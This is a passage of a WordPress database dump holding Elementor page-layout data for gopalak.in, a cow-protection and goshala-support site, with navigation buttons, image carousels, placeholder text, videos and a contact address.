button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10227,1710,'_elementor_page_assets','a:0:{}'),(10229,1711,'_elementor_edit_mode','builder'),(10230,1711,'_elementor_template_type','wp-page'),(10231,1711,'_elementor_version','3.7.8'),(10232,1711,'_wp_page_template','elementor_canvas'),(10233,1711,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 